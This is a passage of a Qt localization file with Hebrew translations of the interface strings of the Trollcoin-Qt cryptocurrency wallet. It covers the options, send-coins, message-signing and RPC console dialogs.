<location line="+4"/>
<source>%1 behind</source>
        <translation>%1 מאחור</translation>
</message>
<message>
<location line="+14"/>
<source>Last received block was generated %1 ago.</source>
        <translation>הבלוק האחרון שהתקבל נוצר לפני %1.</translation>
</message>
<message>
<location line="+2"/>
<source>Transactions after this will not yet be visible.</source>
        <translation>פעולות נוספות לאחר מכן טרם יהיו גלויות.</translation>
</message>
<message>
<location line="+22"/>
<source>Error</source>
<translation>שגיאה</translation>
</message>
<message>
<location line="+3"/>
<source>Warning</source>
<translation>אזהרה</translation>
</message>
<message>
<location line="+3"/>
<source>Information</source>
<translation>מידע</translation>
</message>
<message>
<location line="+70"/>
<source>This transaction is over the size limit. You can still send it for a fee of %1, which goes to the nodes that process your transaction and helps to support the network. Do you want to pay the fee?</source>
<translation>פעולה זו חורגת מגבולות הגודל. עדיין באפשרותך לשלוח אותה תמורת עמלה של %1, המיועדת לצמתים שמעבדים את הפעולה שלך ועוזרת לתמוך ברשת. האם ברצונך לשלם את העמלה?</translation>
</message>
<message>
<location line="-140"/>
<source>Up to date</source>
<translation>עדכני</translation>
</message>
<message>
<location line="+31"/>
<source>Catching up...</source>
<translation>מתעדכן...</translation>
</message>
<message>
<location line="+113"/>
<source>Confirm transaction fee</source>
<translation>אשר עמלת פעולה</translation>
</message>
<message>
<location line="+8"/>
<source>Sent transaction</source>
<translation>פעולה שנשלחה</translation>
</message>
<message>
<location line="+0"/>
<source>Incoming transaction</source>
<translation>פעולה שהתקבלה</translation>
</message>
<message>
<location line="+1"/>
<source>Date: %1
Amount: %2
Type: %3
Address: %4
</source>
<translation>תאריך: %1
כמות: %2
סוג: %3
כתובת: %4</translation>
</message>
<message>
<location line="+33"/>
<location line="+23"/>
<source>URI handling</source>
<translation>תפעול URI</translation>
</message>
<message>
<location line="-23"/>
<location line="+23"/>
<source>URI can not be parsed! This can be caused by an invalid Trollcoin address or malformed URI parameters.</source>
        <translation>לא ניתן לנתח את ה-URI! זה יכול להיגרם מכתובת טרולקוין לא תקינה או מפרמטרי URI פגומים.</translation>
</message>
<message>
<location line="+17"/>
<source>Wallet is <b>encrypted</b> and currently <b>unlocked</b></source>
<translation>הארנק <b>מוצפן</b> וכרגע <b>פתוח</b></translation>
</message>
<message>
<location line="+8"/>
<source>Wallet is <b>encrypted</b> and currently <b>locked</b></source>
<translation>הארנק <b>מוצפן</b> וכרגע <b>נעול</b></translation>
</message>
<message>
<location filename="../bitcoin.cpp" line="+111"/>
<source>A fatal error occurred. Trollcoin can no longer continue safely and will quit.</source>
        <translation>אירעה שגיאה קריטית. טרולקוין אינו יכול להמשיך לפעול בבטחה ולכן ייסגר.</translation>
</message>
</context>
<context>
<name>ClientModel</name>
<message>
<location filename="../clientmodel.cpp" line="+104"/>
<source>Network Alert</source>
<translation>אזעקת רשת</translation>
</message>
</context>
<context>
<name>EditAddressDialog</name>
<message>
<location filename="../forms/editaddressdialog.ui" line="+14"/>
<source>Edit Address</source>
<translation>ערוך כתובת</translation>
</message>
<message>
<location line="+11"/>
<source>&Label</source>
<translation>ת&וית</translation>
</message>
<message>
<location line="+10"/>
<source>The label associated with this address book entry</source>
<translation>התוית המשויכת לרשומה הזו בפנקס הכתובות</translation>
</message>
<message>
<location line="+7"/>
<source>&Address</source>
<translation>&כתובת</translation>
</message>
<message>
<location line="+10"/>
<source>The address associated with this address book entry. This can only be modified for sending addresses.</source>
<translation>הכתובת המשויכת לרשומה זו בפנקס הכתובות. ניתן לשנות זאת רק עבור כתובות לשליחה.</translation>
</message>
<message>
<location filename="../editaddressdialog.cpp" line="+21"/>
<source>New receiving address</source>
<translation>כתובת חדשה לקבלה</translation>
</message>
<message>
<location line="+4"/>
<source>New sending address</source>
<translation>כתובת חדשה לשליחה</translation>
</message>
<message>
<location line="+3"/>
<source>Edit receiving address</source>
<translation>ערוך כתובת לקבלה</translation>
</message>
<message>
<location line="+4"/>
<source>Edit sending address</source>
<translation>ערוך כתובת לשליחה</translation>
</message>
<message>
<location line="+76"/>
<source>The entered address "%1" is already in the address book.</source>
<translation>הכתובת שהכנסת "%1" כבר נמצאת בפנקס הכתובות.</translation>
</message>
<message>
<location line="-5"/>
<source>The entered address "%1" is not a valid Trollcoin address.</source>
        <translation>הכתובת שהוכנסה "%1" אינה כתובת טרולקוין תקינה.</translation>
</message>
<message>
<location line="+10"/>
<source>Could not unlock wallet.</source>
<translation>פתיחת הארנק נכשלה.</translation>
</message>
<message>
<location line="+5"/>
<source>New key generation failed.</source>
<translation>יצירת מפתח חדש נכשלה.</translation>
</message>
</context>
<context>
<name>GUIUtil::HelpMessageBox</name>
<message>
<location filename="../guiutil.cpp" line="+424"/>
<location line="+12"/>
<source>Trollcoin-Qt</source>
<translation>Trollcoin-Qt</translation>
</message>
<message>
<location line="-12"/>
<source>version</source>
<translation>גרסה</translation>
</message>
<message>
<location line="+2"/>
<source>Usage:</source>
<translation>שימוש:</translation>
</message>
<message>
<location line="+1"/>
<source>command-line options</source>
<translation>אפשרויות שורת פקודה</translation>
</message>
<message>
<location line="+4"/>
<source>UI options</source>
<translation>אפשרויות ממשק</translation>
</message>
<message>
<location line="+1"/>
<source>Set language, for example "de_DE" (default: system locale)</source>
        <translation>קבע שפה, למשל "he_IL" (ברירת מחדל: שפת המערכת)</translation>
</message>
<message>
<location line="+1"/>
<source>Start minimized</source>
<translation>התחל ממוזער</translation>
</message>
<message>
<location line="+1"/>
<source>Show splash screen on startup (default: 1)</source>
<translation>הצג מסך פתיחה בעת הפעלה (ברירת מחדל: 1)</translation>
</message>
</context>
<context>
<name>OptionsDialog</name>
<message>
<location filename="../forms/optionsdialog.ui" line="+14"/>
<source>Options</source>
<translation>אפשרויות</translation>
</message>
<message>
<location line="+16"/>
<source>&Main</source>
<translation>ראשי</translation>
</message>
<message>
<location line="+6"/>
<source>Optional transaction fee per kB that helps make sure your transactions are processed quickly. Most transactions are 1 kB.</source>
        <translation>עמלת פעולה אופציונלית לכל קילובייט, העוזרת להבטיח שהפעולות שלך יעובדו במהירות. רוב הפעולות הן בגודל קילובייט אחד.</translation>
</message>
<message>
<location line="+15"/>
<source>Pay transaction &fee</source>
<translation>שלם &עמלת פעולה</translation>
</message>
<message>
<location line="+31"/>
<source>Automatically start Trollcoin after logging in to the system.</source>
        <translation>הפעל את טרולקוין באופן אוטומטי לאחר התחברות למערכת.</translation>
</message>
<message>
<location line="+3"/>
<source>&Start Trollcoin on system login</source>
        <translation>התחל את טרולקוין בעת התחברות למערכת</translation>
</message>
<message>
<location line="+35"/>
<source>Reset all client options to default.</source>
        <translation>אפס את כל אפשרויות התוכנה לברירת המחדל.</translation>
</message>
<message>
<location line="+3"/>
<source>&Reset Options</source>
<translation>איפוס אפשרויות</translation>
</message>
<message>
<location line="+13"/>
<source>&Network</source>
<translation>רשת</translation>
</message>
<message>
<location line="+6"/>
<source>Automatically open the Trollcoin client port on the router. This only works when your router supports UPnP and it is enabled.</source>
        <translation>פתח את פורט הטרולקוין בנתב באופן אוטומטי. עובד רק כאשר הנתב שלך תומך ב-UPnP והאפשרות מופעלת בו.</translation>
</message>
<message>
<location line="+3"/>
<source>Map port using &UPnP</source>
<translation>מיפוי פורט באמצעות UPnP</translation>
</message>
<message>
<location line="+7"/>
<source>Connect to the Trollcoin network through a SOCKS proxy (e.g. when connecting through Tor).</source>
        <translation>התחבר לרשת הטרולקוין דרך פרוקסי SOCKS (למשל בעת התחברות דרך Tor).</translation>
</message>
<message>
<location line="+3"/>
<source>&Connect through SOCKS proxy:</source>
        <translation>התחבר דרך פרוקסי SOCKS:</translation>
</message>
<message>
<location line="+9"/>
<source>Proxy &IP:</source>
<translation>כתובת IP של פרוקסי:</translation>
</message>
<message>
<location line="+19"/>
<source>IP address of the proxy (e.g. 127.0.0.1)</source>
<translation>כתובת האינטרנט של הפרוקסי (למשל 127.0.0.1)</translation>
</message>
<message>
<location line="+7"/>
<source>&Port:</source>
<translation>פורט:</translation>
</message>
<message>
<location line="+19"/>
<source>Port of the proxy (e.g. 9050)</source>
<translation>הפורט של הפרוקסי (למשל 9050)</translation>
</message>
<message>
<location line="+7"/>
<source>SOCKS &Version:</source>
<translation>גרסת SOCKS:</translation>
</message>
<message>
<location line="+13"/>
<source>SOCKS version of the proxy (e.g. 5)</source>
<translation>גרסת SOCKS של הפרוקסי (למשל 5)</translation>
</message>
<message>
<location line="+36"/>
<source>&Window</source>
<translation>חלון</translation>
</message>
<message>
<location line="+6"/>
<source>Show only a tray icon after minimizing the window.</source>
<translation>הצג סמל מגש בלבד לאחר מזעור החלון.</translation>
</message>
<message>
<location line="+3"/>
<source>&Minimize to the tray instead of the taskbar</source>
<translation>מ&זער למגש במקום לשורת המשימות</translation>
</message>
<message>
<location line="+7"/>
<source>Minimize instead of exit the application when the window is closed. When this option is enabled, the application will be closed only after selecting Quit in the menu.</source>
<translation>מזער את התוכנה במקום לצאת ממנה כשהחלון נסגר. כשאפשרות זו פעילה, התוכנה תיסגר רק לאחר בחירת יציאה מהתפריט.</translation>
</message>
<message>
<location line="+3"/>
<source>M&inimize on close</source>
<translation>מזער בעת סגירה</translation>
</message>
<message>
<location line="+21"/>
<source>&Display</source>
<translation>תצוגה</translation>
</message>
<message>
<location line="+8"/>
<source>User Interface &language:</source>
<translation>שפת ממשק המשתמש:</translation>
</message>
<message>
<location line="+13"/>
<source>The user interface language can be set here. This setting will take effect after restarting Trollcoin.</source>
        <translation>ניתן לקבוע כאן את שפת ממשק המשתמש. הגדרה זו תחול לאחר הפעלה מחדש של טרולקוין.</translation>
</message>
<message>
<location line="+11"/>
<source>&Unit to show amounts in:</source>
<translation>יחידת מדידה להצגת כמויות:</translation>
</message>
<message>
<location line="+13"/>
<source>Choose the default subdivision unit to show in the interface and when sending coins.</source>
<translation>בחר את ברירת המחדל ליחידת החלוקה אשר תוצג בממשק ובעת שליחת מטבעות.</translation>
</message>
<message>
<location line="+9"/>
<source>Whether to show Trollcoin addresses in the transaction list or not.</source>
        <translation>האם להציג כתובות טרולקוין ברשימת הפעולות או לא.</translation>
</message>
<message>
<location line="+3"/>
<source>&Display addresses in transaction list</source>
<translation>הצג כתובות ברשימת הפעולות</translation>
</message>
<message>
<location line="+71"/>
<source>&OK</source>
<translation>אישור</translation>
</message>
<message>
<location line="+7"/>
<source>&Cancel</source>
<translation>ביטול</translation>
</message>
<message>
<location line="+10"/>
<source>&Apply</source>
<translation>יישום</translation>
</message>
<message>
<location filename="../optionsdialog.cpp" line="+53"/>
<source>default</source>
<translation>ברירת מחדל</translation>
</message>
<message>
<location line="+130"/>
<source>Confirm options reset</source>
<translation>אשר את איפוס האפשרויות</translation>
</message>
<message>
<location line="+1"/>
<source>Some settings may require a client restart to take effect.</source>
<translation>כמה מההגדרות עשויות לדרוש אתחול התוכנה כדי להיכנס לפועל.</translation>
</message>
<message>
<location line="+0"/>
<source>Do you want to proceed?</source>
<translation>האם ברצונך להמשיך?</translation>
</message>
<message>
<location line="+42"/>
<location line="+9"/>
<source>Warning</source>
<translation>אזהרה</translation>
</message>
<message>
<location line="-9"/>
<location line="+9"/>
<source>This setting will take effect after restarting Trollcoin.</source>
        <translation>הגדרה זו תחול לאחר הפעלה מחדש של טרולקוין.</translation>
</message>
<message>
<location line="+29"/>
<source>The supplied proxy address is invalid.</source>
<translation>כתובת הפרוקסי שסופקה אינה תקינה.</translation>
</message>
</context>
<context>
<name>OverviewPage</name>
<message>
<location filename="../forms/overviewpage.ui" line="+14"/>
<source>Form</source>
<translation>טופס</translation>
</message>
<message>
<location line="+50"/>
<location line="+166"/>
<source>The displayed information may be out of date. Your wallet automatically synchronizes with the Trollcoin network after a connection is established, but this process has not completed yet.</source>
        <translation>המידע המוצג עשוי להיות מיושן. הארנק שלך מסתנכרן באופן אוטומטי עם רשת הטרולקוין לאחר כינון חיבור, אך התהליך טרם הסתיים.</translation>
</message>
<message>
<location line="-124"/>
<source>Balance:</source>
<translation>יתרה:</translation>
</message>
<message>
<location line="+29"/>
<source>Unconfirmed:</source>
<translation>ממתין לאישור:</translation>
</message>
<message>
<location line="-78"/>
<source>Wallet</source>
<translation>ארנק</translation>
</message>
<message>
<location line="+107"/>
<source>Immature:</source>
<translation>לא בשל:</translation>
</message>
<message>
<location line="+13"/>
<source>Mined balance that has not yet matured</source>
<translation>מאזן שנכרה וטרם הבשיל</translation>
</message>
<message>
<location line="+46"/>
<source><b>Recent transactions</b></source>
<translation><b>פעולות אחרונות</b></translation>
</message>
<message>
<location line="-101"/>
<source>Your current balance</source>
<translation>היתרה הנוכחית שלך</translation>
</message>
<message>
<location line="+29"/>
<source>Total of transactions that have yet to be confirmed, and do not yet count toward the current balance</source>
<translation>הסכום הכולל של פעולות שטרם אושרו, ועוד אינן נספרות בחישוב היתרה הנוכחית</translation>
</message>
<message>
<location filename="../overviewpage.cpp" line="+116"/>
<location line="+1"/>
<source>out of sync</source>
<translation>לא מסונכרן</translation>
</message>
</context>
<context>
<name>PaymentServer</name>
<message>
<location filename="../paymentserver.cpp" line="+107"/>
<source>Cannot start trollcoin: click-to-pay handler</source>
        <translation>לא ניתן להתחיל את טרולקוין: מטפל לחץ-לתשלום</translation>
</message>
</context>
<context>
<name>QRCodeDialog</name>
<message>
<location filename="../forms/qrcodedialog.ui" line="+14"/>
<source>QR Code Dialog</source>
<translation>שיח קוד QR</translation>
    </message>
    <message>
<source>Request Payment</source>
<translation>בקש תשלום</translation>
</message>
<message>
<location line="+56"/>
<source>Amount:</source>
<translation>כמות:</translation>
</message>
<message>
<location line="-44"/>
<source>Label:</source>
<translation>תוית:</translation>
</message>
<message>
<location line="+19"/>
<source>Message:</source>
<translation>הודעה:</translation>
</message>
<message>
<location line="+71"/>
<source>&Save As...</source>
<translation>&שמור בשם...</translation>
</message>
<message>
<location filename="../qrcodedialog.cpp" line="+62"/>
<source>Error encoding URI into QR Code.</source>
        <translation>שגיאה בקידוד URI לקוד QR.</translation>
</message>
<message>
<location line="+40"/>
<source>The entered amount is invalid, please check.</source>
<translation>הכמות שהוכנסה אינה תקינה, אנא ודא.</translation>
</message>
<message>
<location line="+23"/>
<source>Resulting URI too long, try to reduce the text for label / message.</source>
        <translation>המזהה המתקבל ארוך מדי, נסה לקצר את הטקסט של התוית / ההודעה.</translation>
</message>
<message>
<location line="+25"/>
<source>Save QR Code</source>
<translation>שמור קוד QR</translation>
</message>
<message>
<location line="+0"/>
<source>PNG Images (*.png)</source>
<translation>תמונות PNG (*.png)</translation>
</message>
</context>
<context>
<name>RPCConsole</name>
<message>
<location filename="../forms/rpcconsole.ui" line="+46"/>
<source>Client name</source>
        <translation>שם התוכנה</translation>
</message>
<message>
<location line="+10"/>
<location line="+23"/>
<location line="+26"/>
<location line="+23"/>
<location line="+23"/>
<location line="+36"/>
<location line="+53"/>
<location line="+23"/>
<location line="+23"/>
<location filename="../rpcconsole.cpp" line="+339"/>
<source>N/A</source>
<translation>N/A</translation>
</message>
<message>
<location line="-217"/>
<source>Client version</source>
        <translation>גרסת התוכנה</translation>
</message>
<message>
<location line="-45"/>
<source>&Information</source>
<translation>מידע</translation>
</message>
<message>
<location line="+68"/>
<source>Using OpenSSL version</source>
<translation>משתמש ב-OpenSSL גרסה</translation>
</message>
<message>
<location line="+49"/>
<source>Startup time</source>
<translation>זמן אתחול</translation>
</message>
<message>
<location line="+29"/>
<source>Network</source>
<translation>רשת</translation>
</message>
<message>
<location line="+7"/>
<source>Number of connections</source>
<translation>מספר חיבורים</translation>
</message>
<message>
<location line="+23"/>
<source>On testnet</source>
<translation>ברשת הבדיקה</translation>
</message>
<message>
<location line="+23"/>
<source>Block chain</source>
<translation>שרשרת הבלוקים</translation>
</message>
<message>
<location line="+7"/>
<source>Current number of blocks</source>
<translation>מספר הבלוקים הנוכחי</translation>
</message>
<message>
<location line="+23"/>
<source>Estimated total blocks</source>
<translation>מספר כולל משוער של בלוקים</translation>
</message>
<message>
<location line="+23"/>
<source>Last block time</source>
<translation>זמן הבלוק האחרון</translation>
</message>
<message>
<location line="+52"/>
<source>&Open</source>
<translation>פתח</translation>
</message>
<message>
<location line="+16"/>
<source>Command-line options</source>
<translation>אפשרויות שורת פקודה</translation>
</message>
<message>
<location line="+7"/>
<source>Show the Trollcoin-Qt help message to get a list with possible Trollcoin command-line options.</source>
        <translation>הצג את הודעת העזרה של Trollcoin-Qt כדי לקבל רשימה של אפשרויות שורת הפקודה של טרולקוין.</translation>
</message>
<message>
<location line="+3"/>
<source>&Show</source>
<translation>הצג</translation>
</message>
<message>
<location line="+24"/>
<source>&Console</source>
<translation>לוח בקרה</translation>
</message>
<message>
<location line="-260"/>
<source>Build date</source>
<translation>תאריך בניה</translation>
</message>
<message>
<location line="-104"/>
<source>Trollcoin - Debug window</source>
        <translation>טרולקוין - חלון ניפוי</translation>
</message>
<message>
<location line="+25"/>
<source>Trollcoin Core</source>
        <translation>ליבת טרולקוין</translation>
</message>
<message>
<location line="+279"/>
<source>Debug log file</source>
<translation>קובץ יומן ניפוי</translation>
</message>
<message>
<location line="+7"/>
<source>Open the Trollcoin debug log file from the current data directory. This can take a few seconds for large log files.</source>
<translation>פתח את קובץ יומן הניפוי מתיקיית הנתונים הנוכחית. זה עשוי לקחת מספר שניות עבור קובצי יומן גדולים.</translation>
</message>
<message>
<location line="+102"/>
<source>Clear console</source>
<translation>נקה לוח בקרה</translation>
</message>
<message>
<location filename="../rpcconsole.cpp" line="-30"/>
<source>Welcome to the Trollcoin RPC console.</source>
        <translation>ברוכים הבאים ללוח בקרת ה-RPC של טרולקוין.</translation>
</message>
<message>
<location line="+1"/>
<source>Use up and down arrows to navigate history, and <b>Ctrl-L</b> to clear screen.</source>
<translation>השתמש בחיצים למעלה ולמטה כדי לנווט בהיסטוריה, ו- <b>Ctrl-L</b> כדי לנקות את המסך.</translation>
</message>
<message>
<location line="+1"/>
<source>Type <b>help</b> for an overview of available commands.</source>
<translation>הקלד <b>help</b> בשביל סקירה של הפקודות הזמינות.</translation>
</message>
</context>
<context>
<name>SendCoinsDialog</name>
<message>
<location filename="../forms/sendcoinsdialog.ui" line="+14"/>
<location filename="../sendcoinsdialog.cpp" line="+124"/>
<location line="+5"/>
<location line="+5"/>
<location line="+5"/>
<location line="+6"/>
<location line="+5"/>
<location line="+5"/>
<source>Send Coins</source>
<translation>שלח מטבעות</translation>
</message>
<message>
<location line="+50"/>
<source>Send to multiple recipients at once</source>
<translation>שלח למספר מקבלים בו-זמנית</translation>
</message>
<message>
<location line="+3"/>
<source>Add &Recipient</source>
<translation>הוסף מקבל</translation>
</message>
<message>
<location line="+20"/>
<source>Remove all transaction fields</source>
<translation>הסר את כל השדות בפעולה</translation>
</message>
<message>
<location line="+3"/>
<source>Clear &All</source>
<translation>נקה הכל</translation>
</message>
<message>
<location line="+22"/>
<source>Balance:</source>
<translation>יתרה:</translation>
</message>
<message>
<location line="+10"/>
<source>123.456 BTC</source>
        <translation>123.456 טרולקוין</translation>
</message>
<message>
<location line="+31"/>
<source>Confirm the send action</source>
<translation>אשר את פעולת השליחה</translation>
</message>
<message>
<location line="+3"/>
<source>S&end</source>
<translation>שלח</translation>
</message>
<message>
<location filename="../sendcoinsdialog.cpp" line="-59"/>
<source><b>%1</b> to %2 (%3)</source>
<translation><b>%1</b> ל- %2 (%3)</translation>
</message>
<message>
<location line="+5"/>
<source>Confirm send coins</source>
<translation>אשר שליחת מטבעות</translation>
</message>
<message>
<location line="+1"/>
<source>Are you sure you want to send %1?</source>
<translation>האם אתה בטוח שברצונך לשלוח %1?</translation>
</message>
<message>
<location line="+0"/>
<source> and </source>
<translation> ו- </translation>
</message>
<message>
<location line="+23"/>
<source>The recipient address is not valid, please recheck.</source>
<translation>כתובת המקבל אינה תקינה, אנא בדוק שנית.</translation>
</message>
<message>
<location line="+5"/>
<source>The amount to pay must be larger than 0.</source>
<translation>הכמות לשלם חייבת להיות גדולה מ-0.</translation>
</message>
<message>
<location line="+5"/>
<source>The amount exceeds your balance.</source>
<translation>הכמות עולה על המאזן שלך.</translation>
</message>
<message>
<location line="+5"/>
<source>The total exceeds your balance when the %1 transaction fee is included.</source>
<translation>הכמות הכוללת, ובכללה עמלת פעולה בסך %1, עולה על המאזן שלך.</translation>
</message>
<message>
<location line="+6"/>
<source>Duplicate address found, can only send to each address once per send operation.</source>
<translation>כתובת כפולה נמצאה, ניתן לשלוח לכל כתובת רק פעם אחת בכל פעולת שליחה.</translation>
</message>
<message>
<location line="+5"/>
<source>Error: Transaction creation failed!</source>
<translation>שגיאה: יצירת הפעולה נכשלה!</translation>
</message>
<message>
<location line="+5"/>
<source>Error: The transaction was rejected. This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source>
        <translation>שגיאה: הפעולה נדחתה. זה עשוי לקרות אם חלק מהמטבעות בארנק שלך כבר נוצלו, למשל אם השתמשת בעותק של wallet.dat ומטבעות נוצלו בעותק אך לא סומנו כמנוצלות כאן.</translation>
</message>
</context>
<context>
<name>SendCoinsEntry</name>
<message>
<location filename="../forms/sendcoinsentry.ui" line="+14"/>
<source>Form</source>
<translation>טופס</translation>
</message>
<message>
<location line="+15"/>
<source>A&mount:</source>
<translation>כ&מות:</translation>
</message>
<message>
<location line="+13"/>
<source>Pay &To:</source>
<translation>שלם &ל:</translation>
</message>
<message>
<location line="+34"/>
<source>The address to send the payment to (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
<translation>הכתובת שאליה ישלח התשלום (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
<message>
<location line="+60"/>
<location filename="../sendcoinsentry.cpp" line="+26"/>
<source>Enter a label for this address to add it to your address book</source>
        <translation>הכנס תוית לכתובת הזאת כדי להוסיף אותה לפנקס הכתובות</translation>
</message>
<message>
<location line="-78"/>
<source>&Label:</source>
<translation>ת&וית:</translation>
</message>
<message>
<location line="+28"/>
<source>Choose address from address book</source>
<translation>בחר כתובת מפנקס הכתובות</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<location line="+7"/>
<source>Paste address from clipboard</source>
        <translation>הדבק כתובת מהלוח</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<location line="+7"/>
<source>Remove this recipient</source>
<translation>הסר את המקבל הזה</translation>
</message>
<message>
<location filename="../sendcoinsentry.cpp" line="+1"/>
<source>Enter a Trollcoin address (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
        <translation>הכנס כתובת טרולקוין (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
</context>
<context>
<name>SignVerifyMessageDialog</name>
<message>
<location filename="../forms/signverifymessagedialog.ui" line="+14"/>
<source>Signatures - Sign / Verify a Message</source>
<translation>חתימות - חתום או אמת הודעה</translation>
</message>
<message>
<location line="+13"/>
<source>&Sign Message</source>
<translation>חתום על הו&דעה</translation>
</message>
<message>
<location line="+6"/>
<source>You can sign messages with your addresses to prove you own them. Be careful not to sign anything vague, as phishing attacks may try to trick you into signing your identity over to them. Only sign fully-detailed statements you agree to.</source>
<translation>אתה יכול לחתום על הודעות עם הכתובות שלך כדי להוכיח שהן בבעלותך. היזהר לא לחתום על משהו מעורפל, שכן התקפות פישינג עשויות לגרום לך בעורמה למסור את זהותך. חתום רק על אמרות מפורטות לחלוטין שאתה מסכים עימן.</translation>
</message>
<message>
<location line="+18"/>
<source>The address to sign the message with (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
<translation>הכתובת איתה לחתום על ההודעה (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
<message>
<location line="+10"/>
<location line="+213"/>
<source>Choose an address from the address book</source>
<translation>בחר כתובת מפנקס הכתובות</translation>
</message>
<message>
<location line="-203"/>
<location line="+213"/>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<location line="-203"/>
<source>Paste address from clipboard</source>
<translation>הדבק כתובת מהלוח</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<location line="+12"/>
<source>Enter the message you want to sign here</source>
        <translation>הכנס כאן את ההודעה שעליה ברצונך לחתום</translation>
</message>
<message>
<location line="+7"/>
<source>Signature</source>
<translation>חתימה</translation>
</message>
<message>
<location line="+27"/>
<source>Copy the current signature to the system clipboard</source>
<translation>העתק את החתימה הנוכחית ללוח המערכת</translation>
</message>
<message>
<location line="+21"/>
<source>Sign the message to prove you own this Trollcoin address</source>
        <translation>חתום על ההודעה כדי להוכיח שכתובת הטרולקוין הזו בבעלותך</translation>
</message>
<message>
<location line="+3"/>
<source>Sign &Message</source>
<translation>חתום על הודעה</translation>
</message>
<message>
<location line="+14"/>
<source>Reset all sign message fields</source>
<translation>אפס את כל שדות החתימה על הודעה</translation>
</message>
<message>
<location line="+3"/>
<location line="+146"/>
<source>Clear &All</source>
<translation>נקה הכל</translation>
</message>
<message>
<location line="-87"/>
<source>&Verify Message</source>
<translation>אמת הודעה</translation>
</message>
<message>
<location line="+6"/>
<source>Enter the signing address, message (ensure you copy line breaks, spaces, tabs, etc. exactly) and signature below to verify the message. Be careful not to read more into the signature than what is in the signed message itself, to avoid being tricked by a man-in-the-middle attack.</source>
<translation>הכנס למטה את הכתובת החותמת, ההודעה (ודא שאתה מעתיק מעברי שורה, רווחים, טאבים וכו' באופן מדויק) והחתימה כדי לאמת את ההודעה. היזהר לא לפרש את החתימה כיותר ממה שמופיע בהודעה החתומה בעצמה, כדי להימנע מליפול קורבן למתקפת איש-באמצע.</translation>
</message>
<message>
<location line="+21"/>
<source>The address the message was signed with (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
<translation>הכתובת איתה ההודעה נחתמה (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
<message>
<location line="+40"/>
<source>Verify the message to ensure it was signed with the specified Trollcoin address</source>
        <translation>אמת את ההודעה כדי להבטיח שהיא נחתמה עם כתובת הטרולקוין הנתונה</translation>
</message>
<message>
<location line="+3"/>
<source>Verify &Message</source>
<translation>אימות הודעה</translation>
</message>
<message>
<location line="+14"/>
<source>Reset all verify message fields</source>
<translation>אפס את כל שדות אימות הודעה</translation>
</message>
<message>
<location filename="../signverifymessagedialog.cpp" line="+27"/>
<location line="+3"/>
<source>Enter a Trollcoin address (e.g. Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</source>
        <translation>הכנס כתובת טרולקוין (למשל Ler4HNAEfwYhBmGXcFP2Po1NpRUEiK8km2)</translation>
</message>
<message>
<location line="-2"/>
<source>Click "Sign Message" to generate signature</source>
<translation>לחץ "חתום על ההודעה" כדי לחולל חתימה</translation>
</message>
<message>
<location line="+3"/>
<source>Enter Trollcoin signature</source>
        <translation>הכנס חתימת טרולקוין</translation>
</message>
<message>
<location line="+82"/>
<location line="+81"/>
<source>The entered address is invalid.</source>
<translation>הכתובת שהוכנסה אינה תקינה.</translation>
</message>
<message>
<location line="-81"/>
<location line="+8"/>
<location line="+73"/>
<location line="+8"/>
<source>Please check the address and try again.</source>
<translation>אנא בדוק את הכתובת ונסה שנית.</translation>
</message>
<message>
<location line="-81"/>
<location line="+81"/>
<source>The entered address does not refer to a key.</source>
<translation>הכתובת שהוכנסה אינה מתייחסת למפתח.</translation>
</message>
<message>
<location line="-73"/>
<source>Wallet unlock was cancelled.</source>
<translation>פתיחת הארנק בוטלה.</translation>
</message>
<message>
<location line="+8"/>
<source>Private key for the entered address is not available.</source>
<translation>המפתח הפרטי עבור הכתובת שהוכנסה אינו זמין.</translation>
</message>
<message>
<location line="+12"/>
<source>Message signing failed.</source>
<translation>החתימה על ההודעה נכשלה.</translation>
</message>
<message>
<location line="+5"/>
<source>Message signed.</source>
<translation>ההודעה נחתמה.</translation>
</message>
<message>
<location line="+59"/>
<source>The signature could not be decoded.</source>
<translation>לא ניתן לפענח את החתימה.</translation>
</message>
<message>
<location line="+0"/>
<location line="+13"/>
<source>Please check the signature and try again.</source>
<translation>אנא בדוק את החתימה ונסה שנית.</translation>
</message>
<message>
<location line="+0"/>
<source>The signature did not match the message digest.</source>
<translation>החתימה לא תואמת את תקציר ההודעה.</translation>
</message>
<message>
<location line="+7"/>
<source>Message verification failed.</source>
<translation>אימות ההודעה נכשל.</translation>
</message>
<message>
<location line="+5"/>
<source>Message verified.</source>
<translation>ההודעה אומתה.</translation>
</message>
</context>
<context>
<name>SplashScreen</name>
<message>
<location filename="../splashscreen.cpp" line="+22"/>
<source>The Trollcoin developers</source>
        <translation>מפתחי טרולקוין</translation>
</message>
<message>
<location line="+1"/>
<source>[testnet]</source>
<translation>[רשת-בדיקה]</translation>
</message>
</context>
<context>
<name>TransactionDesc</name>
<message>
<location filename="../transactiondesc.cpp" line="+20"/>
<source>Open until %1</source>
<translation>פתוח עד %1</translation>
</message>
<message>
<location line="+6"/>
<source>%1/offline</source>
<translation>%1/מנותק</translation>
</message>
<message>
<location line="+2"/>
<source>%1/unconfirmed</source>
<translation>%1/ממתין לאישור</translation>
</message>
<message>
<location line="+2"/>
<source>%1 confirmations</source>
<translation>%1 אישורים</translation>
</message>
<message>
<location line="+18"/>
<source>Status</source>
<translation>מצב</translation>
</message>
<message numerus="yes">
<location line="+7"/>
<source>, broadcast through %n node(s)</source>
<translation><numerusform>, הופץ דרך צומת אחד</numerusform><numerusform>, הופץ דרך %n צמתים</numerusform></translation>
</message>
<message>
<location line="+4"/>
<source>Date</source>
<translation>תאריך</translation>
</message>
<message>
<location line="+7"/>
<source>Source</source>
